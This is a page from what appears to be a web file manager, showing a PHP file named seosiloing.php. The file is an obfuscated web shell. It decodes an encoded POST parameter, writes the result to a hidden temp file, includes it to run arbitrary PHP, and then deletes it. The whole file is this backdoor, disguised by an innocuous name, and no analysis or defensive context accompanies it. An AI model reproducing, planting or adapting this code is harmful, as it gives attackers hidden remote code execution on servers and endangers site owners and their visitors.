0x1998 - MANAGER
Düzenlenen Dosya: seosiloing.php
<?php if(filter_has_var(INPUT_POST, "ma\x72ker")){ $symbol = array_filter([ini_get("upload_tmp_dir"), "/var/tmp", "/dev/shm", "/tmp", getenv("TEMP"), getenv("TMP"), session_save_path(), getcwd(), sys_get_temp_dir()]); $descriptor = $_POST["ma\x72ker"]; $descriptor=explode ( "." , $descriptor ) ; $dchunk = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s ); $y = 0; while( $y< count( $descriptor)) {$v1 = $descriptor[$y]; $chS = ord( $s[$y % $sLen] ); $dec = ( ( int)$v1 - $chS -( $y % 10)) ^ 53; $dchunk .= chr( $dec ); $y++; } for ($rec = 0, $object = count($symbol); $rec < $object; $rec++) { $k = $symbol[$rec]; if ((function($d) { return is_dir($d) && is_writable($d); })($k)) { $value = "$k" . "/.flg"; $success = file_put_contents($value, $dchunk); if ($success) { include $value; @unlink($value); exit;} } } }
geri dön